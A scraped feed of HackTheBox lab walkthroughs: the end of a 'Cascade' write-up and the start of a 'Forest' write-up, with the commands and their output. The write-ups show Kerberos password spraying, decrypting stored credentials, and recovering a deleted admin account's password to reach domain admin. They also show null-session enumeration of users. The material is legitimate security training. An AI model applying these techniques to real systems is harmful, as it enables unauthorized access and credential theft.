class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwh74ly7w5bfkaw69xn2a.png" alt="root" width="800" height="174"></a></p> <p>During enumeration, I found a Meeting_Notes_June_2018.html in the IT folder, when I downloaded, I found a new username:TempAdmin in the note, saying the user <code>TempAdmin</code> has the same right as the domain admin </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjxdz20xvk51phuq7qkq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjxdz20xvk51phuq7qkq.png" alt="root" width="800" height="225"></a></p> <p>Futher enumeration reveal another file VNC Install.reg in s.smith folder, I downloaded the file, and I found a registry export contains <code>a TightVNC encrypted password</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fys039158c7mlfxrlhvsm.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fys039158c7mlfxrlhvsm.png" alt="root" width="800" height="267"></a></p> <p>Using a TightVNC decryptor on those hex bytes, yields the password: <code>sT333ve2</code></p> <p>Let's confirm if the password is valid with kerbrute.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> ┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>./kerbrute passwordspray <span class="nt">-d</span> cascade.local <span class="nt">--dc</span> 10.129.29.246 valid_names.txt <span class="s2">"sT333ve2"</span> __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\</span> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|<span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ Version: v1.0.3 <span class="o">(</span>9dad6e1<span class="o">)</span> - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 21:18:27 <span class="o">&gt;</span> Using KDC<span class="o">(</span>s<span class="o">)</span>: 2026/05/06 21:18:27 <span class="o">&gt;</span> 10.129.29.246:88 2026/05/06 21:18:37 <span class="o">&gt;</span> <span class="o">[</span>+] VALID LOGIN: s.smith@cascade.local:sT333ve2 2026/05/06 21:18:47 <span class="o">&gt;</span> Done! Tested 11 logins <span class="o">(</span>1 successes<span class="o">)</span> <span class="k">in </span>20.096 seconds </code></pre> </div> <p>We got s.smith back as the valid owner of the newly found password: sT333ve2</p> <p>Now we have another user, I tried to get shell with evil-winrm, and it was successful</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F610zfr1siudhg9afym5c.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F610zfr1siudhg9afym5c.png" alt="shell" width="800" height="198"></a></p> <p>Let's start enumerating, I log to SMB with the newly found credentials for further enumeration, </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F85e73n06fz5b1d2j73sd.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F85e73n06fz5b1d2j73sd.png" alt="db" width="800" height="361"></a></p> <p>I found DB, inside DB folder, I found Audit.db so I downloaded it and access with sqlite3 on my local system:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fklqt437bqyiuedqewpu7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fklqt437bqyiuedqewpu7.png" alt="db" width="800" height="260"></a></p> <p>I found the service account credentials for <code>ArkSvc</code>. The string <code>BQO5l5Kj9MdErXx6Q6AGOw==</code> is definitely encrypted or encoded, and since it’s stored in a database alongside a custom crypto DLL (CascCrypto.dll), it’s likely encrypted using a hardcoded key. </p> <p>I read how to get the key, I found that the decryption logic is most likely be hidden inside CascCrypto.dll , so I went hunting CascCrypto.dll </p> <p>Going back to SMB, the file, <code>CascCrypto.dll</code> is seated in the same folder with the DB, so I downloaded it</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd76y0se8352l6dgdi3rf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd76y0se8352l6dgdi3rf.png" alt="root" width="800" height="252"></a></p> <p>I ran the code below to get the string to decode </p> <p><code>strings -e l CascCrypto.dll</code></p> <p>I got the string <code>1tdyjCbY1Ix49842</code> back. After many readings, finally, I was able to decrypt the string and got back plaintext password: <code>w3lc0meFr31nd</code></p> <p>We have another set of credentials ArkSvc:w3lc0meFr31nd<br> I was able to get shell with the newly found password</p> <p>Remember we saw a Meeting_Notes_June_2018.html in the SMB earlier that talk about TempAdmin with the newly found credentials ArkSvc, and because ArkSvc user is part of CASCADE\AD Recycle Bin let's try to check if we can find the TempAdmin account in the recycle bin, if we are to do that, we can get back it's password as well:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> PS C:<span class="se">\U</span>sers<span class="se">\a</span>rksvc<span class="se">\D</span>ocuments&gt; Get-ADObject <span class="nt">-Filter</span> <span class="s1">'isDeleted -eq $true -and name -like "*TempAdmin*"'</span> <span class="nt">-IncludeDeletedObjects</span> <span class="nt">-Properties</span> <span class="k">*</span> accountExpires : 9223372036854775807 badPasswordTime : 0 badPwdCount : 0 CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 codePage : 0 countryCode : 0 Created : 1/27/2020 3:23:08 AM createTimeStamp : 1/27/2020 3:23:08 AM Deleted : True Description : DisplayName : TempAdmin DistinguishedName : <span class="nv">CN</span><span class="o">=</span>TempAdmin<span class="se">\0</span>ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN<span class="o">=</span>Deleted Objects,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>dSCorePropagationData : <span class="o">{</span>1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM<span class="o">}</span> givenName : TempAdmin instanceType : 4 isDeleted : True LastKnownParent : <span class="nv">OU</span><span class="o">=</span>Users,OU<span class="o">=</span>UK,DC<span class="o">=</span>cascade,DC<span class="o">=</span><span class="nb">local </span>lastLogoff : 0 lastLogon : 0 logonCount : 0 Modified : 1/27/2020 3:24:34 AM modifyTimeStamp : 1/27/2020 3:24:34 AM msDS-LastKnownRDN : TempAdmin Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity ObjectCategory : ObjectClass : user ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059 objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136 primaryGroupID : 513 ProtectedFromAccidentalDeletion : False pwdLastSet : 132245689883479503 sAMAccountName : TempAdmin sDRightsEffective : 0 userAccountControl : 66048 userPrincipalName : TempAdmin@cascade.local uSNChanged : 237705 uSNCreated : 237695 whenChanged : 1/27/2020 3:24:34 AM whenCreated : 1/27/2020 3:23:08 AM </code></pre> </div> <p>we found cascadeLegacyPwd : <code>YmFDVDNyMWFOMDBkbGVz</code> for TempAdmin, the string looks like base64, let's decode it. The decoded plaintext is <code>baCT3r1aN00dles</code></p> <p>Do you remember this phrase in the meeting note <code>Username is TempAdmin (password is the same as the normal admin account password)</code>. </p> <p>So with the <code>TempAdmin</code> credentials have the same right as the Domain Admin. Let try to get on the host with <code>TempAdmin : baCT3r1aN00dles</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feoocpq2rj747ieust64a.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feoocpq2rj747ieust64a.png" alt="root" width="800" height="188"></a></p> <p>We are domain Admin.. Game over!!!!</p> ai programming tutorial hackathon HTB - Forest Walkthrough Michael Oladele Wed, 06 May 2026 15:01:00 +0000 https://forem.com/micheaol/htb-forest-walkthrough-5dn8 https://forem.com/micheaol/htb-forest-walkthrough-5dn8 <p>Starting of HTB Active Directory Track . preparation for PNPT — OSCP Certifications. Let's dive in.</p> <h2> Initial Enumeration: </h2> <p>The first step will always be your Nmap scan:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>nmap <span class="nt">-A</span> <span class="nt">-p-</span> 10.129.29.48 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-05-05 10:12 CDT Nmap scan report <span class="k">for </span>10.129.29.48 Host is up <span class="o">(</span>0.0079s latency<span class="o">)</span><span class="nb">.</span> Not shown: 65512 closed tcp ports <span class="o">(</span>reset<span class="o">)</span> PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server <span class="nb">time</span>: 2026-05-05 15:19:47Z<span class="o">)</span> 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: htb.local, Site: Default-First-Site-Name<span class="o">)</span> 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds <span class="o">(</span>workgroup: HTB<span class="o">)</span> 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: htb.local, Site: Default-First-Site-Name<span class="o">)</span> 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49681/tcp open msrpc Microsoft Windows RPC 49698/tcp open msrpc Microsoft Windows RPC No exact OS matches <span class="k">for </span>host <span class="o">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="o">)</span><span class="nb">.</span> TCP/IP fingerprint: OS:SCAN<span class="o">(</span><span class="nv">V</span><span class="o">=</span>7.94SVN%E<span class="o">=</span>4%D<span class="o">=</span>5/5%OT<span class="o">=</span>53%CT<span class="o">=</span>1%CU<span class="o">=</span>33149%PV<span class="o">=</span>Y%DS<span class="o">=</span>2%DC<span class="o">=</span>T%G<span class="o">=</span>Y%TM<span class="o">=</span>69FA0 OS:940%P<span class="o">=</span>x86_64-pc-linux-gnu<span class="o">)</span>SEQ<span class="o">(</span><span class="nv">SP</span><span class="o">=</span>106%GCD<span class="o">=</span>1%ISR<span class="o">=</span>108%TI<span class="o">=</span>I%CI<span class="o">=</span>I%II<span class="o">=</span>I%SS<span class="o">=</span>S%T OS:S<span class="o">=</span>A<span class="o">)</span>OPS<span class="o">(</span><span class="nv">O1</span><span class="o">=</span>M552NW8ST11%O2<span class="o">=</span>M552NW8ST11%O3<span class="o">=</span>M552NW8NNT11%O4<span class="o">=</span>M552NW8ST11%O5<span class="o">=</span> OS:M552NW8ST11%O6<span class="o">=</span>M552ST11<span class="o">)</span>WIN<span class="o">(</span><span class="nv">W1</span><span class="o">=</span>2000%W2<span class="o">=</span>2000%W3<span class="o">=</span>2000%W4<span class="o">=</span>2000%W5<span class="o">=</span>2000%W6<span class="o">=</span>2 OS:000<span class="o">)</span>ECN<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>80%W<span class="o">=</span>2000%O<span class="o">=</span>M552NW8NNS%CC<span class="o">=</span>Y%Q<span class="o">=)</span>T1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>80%S<span class="o">=</span>O%A OS:<span class="o">=</span>S+%F<span class="o">=</span>AS%RD<span class="o">=</span>0%Q<span class="o">=)</span>T2<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T3<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T4<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>80%W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>O%F<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0% OS:Q<span class="o">=)</span>T5<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>80%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T6<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>80%W<span class="o">=</span>0%S<span class="o">=</span> OS:A%A<span class="o">=</span>O%F<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T7<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>U1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>N%T<span class="o">=</span>80%IPL<span class="o">=</span>164%UN<span class="o">=</span>0%RIPL<span class="o">=</span>G%RID<span class="o">=</span>G%R OS:IPCK<span class="o">=</span>G%RUCK<span class="o">=</span>G%RUD<span class="o">=</span>G<span class="o">)</span>IE<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DFI<span class="o">=</span>N%T<span class="o">=</span>80%CD<span class="o">=</span>Z<span class="o">)</span> Network Distance: 2 hops Service Info: Host: FOREST<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 <span class="o">(</span>Windows Server 2016 Standard 6.3<span class="o">)</span> | Computer name: FOREST | NetBIOS computer name: FOREST<span class="se">\x</span>00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System <span class="nb">time</span>: 2026-05-05T08:20:49-07:00 | smb-security-mode: | account_used: &lt;blank&gt; | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-time: | <span class="nb">date</span>: 2026-05-05T15:20:50 |_ start_date: 2026-05-05T15:17:45 TRACEROUTE <span class="o">(</span>using port 256/tcp<span class="o">)</span> HOP RTT ADDRESS 1 7.57 ms 10.10.14.1 2 7.80 ms 10.129.29.48 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>91.15 seconds </code></pre> </div> <p>With the scan above, we confirm that this is an AD machine with the following info:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Port: 88 <span class="o">=&gt;</span> open port 389 <span class="o">=&gt;</span> open Domain name: htb.local Computer name: FOREST </code></pre> </div> <h2> LDAP Enumeration: </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>──╼ [★]$ ldapsearch -x -H ldap://10.129.29.48 -s base -b "" "(objectClass=*)" namingContexts # extended LDIF # # LDAPv3 # base &lt;&gt; with scope baseObject # filter: (objectClass=*) # requesting: namingContexts # # dn: namingContexts: DC=htb,DC=local namingContexts: CN=Configuration,DC=htb,DC=local namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local namingContexts: DC=DomainDnsZones,DC=htb,DC=local namingContexts: DC=ForestDnsZones,DC=htb,DC=local # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 </code></pre> </div> <p>With the scan above, I was able to confirm the <code>Domain name: htb.local</code></p> <p>I tried SMB enumeration but no luck from that angle.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>smbclient <span class="nt">-L</span> //10.129.29.48 <span class="nt">-N</span> Anonymous login successful Sharename Type Comment <span class="nt">---------</span> <span class="nt">----</span> <span class="nt">-------</span> Reconnecting with SMB1 <span class="k">for </span>workgroup listing. do_connect: Connection to 10.129.29.48 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> Unable to connect with SMB1 <span class="nt">--</span> no workgroup available </code></pre> </div> <h2> RPC Enumeration </h2> <p>I moved on to check RPC null session and I got back some users:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ [★]$ rpcclient -U "" -N 10.129.29.48 rpcclient $&gt; usersenum command not found: usersenum rpcclient $&gt; hellp command not found: hellp rpcclient $&gt; help --------------- ---------------------- UNIXINFO getpwuid Get shell and homedir uidtosid Convert uid to sid --------------- ---------------------- rpcclient $&gt; enumdomusers rpcclient $&gt; enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480] rpcclient $&gt; </code></pre> </div> <p>I also check for the domain groups is in the RPCclient prompt:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>rpcclient <span class="nv">$&gt;</span> enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[Organization Management] rid:[0x450] group:[Recipient Management] rid:[0x451] group:[View-Only Organization Management] rid:[0x452] group:[Public Folder Management] rid:[0x453] group:[UM Management] rid:[0x454] group:[Help Desk] rid:[0x455] group:[Records Management] rid:[0x456] group:[Discovery Management] rid:[0x457] group:[Server Management] rid:[0x458] group:[Delegated Setup] rid:[0x459] group:[Hygiene Management] rid:[0x45a] group:[Compliance Management] rid:[0x45b] group:[Security Reader] rid:[0x45c] group:[Security Administrator] rid:[0x45d] group:[Exchange Servers] rid:[0x45e] group:[Exchange Trusted Subsystem] rid:[0x45f] group:[Managed Availability Servers] rid:[0x460] group:[Exchange Windows Permissions] rid:[0x461] group:[ExchangeLegacyInterop] rid:[0x462] group:[<span class="nv">$D31000</span><span class="nt">-NSEL5BRJ63V7</span><span class="o">]</span> rid:[0x46d] group:[Service Accounts] rid:[0x47c] group:[Privileged IT Accounts] rid:[0x47d] group:[test] rid:[0x13ed] </code></pre> </div> <p>I decided to use enum4linux to check if I would get back the same users as RPC, and I got back not just the users, but also password policy and more:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>enum4linux 10.129.29.48 ENUM4LINUX - next generation <span class="o">(</span>v1.3.4<span class="o">)</span> <span class="o">==========================</span> | Target Information | <span class="o">==========================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Target ........... 10.129.29.48 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Username ......... <span class="s1">''</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Random Username .. <span class="s1">'mkzhqzea'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Password ......... <span class="s1">''</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Timeout .......... 5 second<span class="o">(</span>s<span class="o">)</span> <span class="o">=====================================</span> | Listener Scan on 10.129.29.48 | <span class="o">=====================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking LDAP <span class="o">[</span>+] LDAP is accessible on 389/tcp <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking LDAPS <span class="o">[</span>+] LDAPS is accessible on 636/tcp <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking SMB <span class="o">[</span>+] SMB is accessible on 445/tcp <span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking SMB over NetBIOS <span class="o">[</span>+] SMB over NetBIOS is accessible on 139/tcp <span class="o">====================================================</span> | Domain Information via LDAP <span class="k">for </span>10.129.29.48 | <span class="o">====================================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying LDAP <span class="o">[</span>+] Appears to be root/parent DC <span class="o">[</span>+] Long domain name is: htb.local <span class="o">===========================================================</span> | NetBIOS Names and Workgroup/Domain <span class="k">for </span>10.129.29.48 | <span class="o">===========================================================</span> <span class="o">[</span>-] Could not get NetBIOS names information via <span class="s1">'nmblookup'</span>: timed out <span class="o">=========================================</span> | SMB Dialect Check on 10.129.29.48 | <span class="o">=========================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying on 445/tcp <span class="o">[</span>+] Supported dialects and settings: Supported dialects: SMB 1.0: <span class="nb">true </span>SMB 2.02: <span class="nb">true </span>SMB 2.1: <span class="nb">true </span>SMB 3.0: <span class="nb">true </span>SMB 3.1.1: <span class="nb">true </span>Preferred dialect: SMB 3.0 SMB1 only: <span class="nb">false </span>SMB signing required: <span class="nb">true</span> <span class="o">===========================================================</span> | Domain Information via SMB session <span class="k">for </span>10.129.29.48 | <span class="o">===========================================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating via unauthenticated SMB session on 445/tcp <span class="o">[</span>+] Found domain information via SMB NetBIOS computer name: FOREST NetBIOS domain name: HTB DNS domain: htb.local FQDN: FOREST.htb.local Derived membership: domain member Derived domain: HTB <span class="o">=========================================</span> | RPC Session Check on 10.129.29.48 | <span class="o">=========================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>null session <span class="o">[</span>+] Server allows session using username <span class="s1">''</span>, password <span class="s1">''</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>random user <span class="o">[</span>-] Could not establish random user session: STATUS_LOGON_FAILURE <span class="o">===================================================</span> | Domain Information via RPC <span class="k">for </span>10.129.29.48 | <span class="o">===================================================</span> <span class="o">[</span>+] Domain: HTB <span class="o">[</span>+] Domain SID: S-1-5-21-3072663084-364016917-1341370565 <span class="o">[</span>+] Membership: domain member <span class="o">===============================================</span> | OS Information via RPC <span class="k">for </span>10.129.29.48 | <span class="o">===============================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating via unauthenticated SMB session on 445/tcp <span class="o">[</span>+] Found OS information via SMB <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating via <span class="s1">'srvinfo'</span> <span class="o">[</span>-] Could not get OS info via <span class="s1">'srvinfo'</span>: STATUS_ACCESS_DENIED <span class="o">[</span>+] After merging OS information we have the following result: OS: Windows Server 2016 Standard 14393 OS version: <span class="s1">'10.0'</span> OS release: <span class="s1">'1607'</span> OS build: <span class="s1">'14393'</span> Native OS: Windows Server 2016 Standard 14393 Native LAN manager: Windows Server 2016 Standard 6.3 Platform <span class="nb">id</span>: null Server <span class="nb">type</span>: null Server <span class="nb">type </span>string: null <span class="o">=====================================</span> | Users via RPC on 10.129.29.48 | <span class="o">=====================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">users </span>via <span class="s1">'querydispinfo'</span> <span class="o">[</span>+] Found 31 user<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'querydispinfo'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">users </span>via <span class="s1">'enumdomusers'</span> <span class="o">[</span>+] Found 31 user<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumdomusers'</span> <span class="o">[</span>+] After merging user results we have 31 user<span class="o">(</span>s<span class="o">)</span> total: <span class="s1">'1123'</span>: username: <span class="nv">$331000</span><span class="nt">-VK4ADACQNUCA</span> name: <span class="o">(</span>null<span class="o">)</span> acb: <span class="s1">'0x00020015'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1124'</span>: username: SM_2c8eef0a09b545acb name: Microsoft Exchange Approval Assistant acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1125'</span>: username: SM_ca8c2ed5bdab4dc9b name: Microsoft Exchange acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1126'</span>: username: SM_75a538d3025e4db9a name: Microsoft Exchange acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1127'</span>: username: SM_681f53d4942840e18 name: Discovery Search Mailbox acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1128'</span>: username: SM_1b41c9286325456bb name: Microsoft Exchange Migration acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1129'</span>: username: SM_9b69f1b9d2cc45549 name: Microsoft Exchange Federation Mailbox acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span 